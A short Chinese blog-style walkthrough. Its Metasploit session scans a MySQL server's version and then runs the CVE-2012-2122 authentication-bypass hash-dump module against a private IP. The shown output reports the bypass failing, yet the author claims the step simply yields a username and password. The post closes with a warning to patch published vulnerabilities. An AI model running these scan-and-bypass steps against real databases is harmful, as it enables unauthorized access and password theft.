假设我们得到了一个Mysql为5.1.61, 5.2.11, 5.3.5, 5.5.22的数据库(下面这个只是操作过程,数据库版本不是含漏洞版本)
msf > use auxiliary/scanner/mysql/mysql_version msf auxiliary(mysql_version) > show options Module options (auxiliary/scanner/mysql/mysql_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 3306 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(mysql_version) > set RHOSTS 10.199.128.61 RHOSTS => 10.199.128.61 msf auxiliary(mysql_version) > set THREADS 5 THREADS => 5 msf auxiliary(mysql_version) > exploit [*] 10.199.128.61:3306 is running MySQL 5.5.44-log (protocol 10) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
第一步就是获取mysql version。第二步便配置Mysql的IP和端口就可以exploit了(事实上有IP足够了,所有端口开放的服务都能扫描得到)
msf auxiliary(mysql_hashdump) > search CVE-2012-2122 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal MySQL Authentication Bypass Password Dump msf auxiliary(mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > msf auxiliary(mysql_authbypass_hashdump) > msf auxiliary(mysql_authbypass_hashdump) > show options Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 3306 yes The target port THREADS 1 yes The number of concurrent threads USERNAME root yes The username to authenticate as msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 10.199.128.61 RHOSTS => 10.199.128.61 msf auxiliary(mysql_authbypass_hashdump) > exploit [+] 10.199.128.61:3306 The server allows logins, proceeding with bypass test [*] 10.199.128.61:3306 Authentication bypass is 10% complete [*] 10.199.128.61:3306 Authentication bypass is 20% complete [*] 10.199.128.61:3306 Authentication bypass is 30% complete [*] 10.199.128.61:3306 Authentication bypass is 40% complete [*] 10.199.128.61:3306 Authentication bypass is 50% complete [*] 10.199.128.61:3306 Authentication bypass is 60% complete [*] 10.199.128.61:3306 Authentication bypass is 70% complete [*] 10.199.128.61:3306 Authentication bypass is 80% complete [*] 10.199.128.61:3306 Authentication bypass is 90% complete [*] 10.199.128.61:3306 Authentication bypass is 100% complete [-] 10.199.128.61:3306 Unable to bypass authentication, this target may not be vulnerable [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
然后这样就这么简单,你会得到一个用户名和密码。
-------------------
想想看,假设你的数据库有漏洞,别人有你一个公网IP,就能获取你的数据库信息。。。所以,网上公布重大漏洞时,不要置身事外。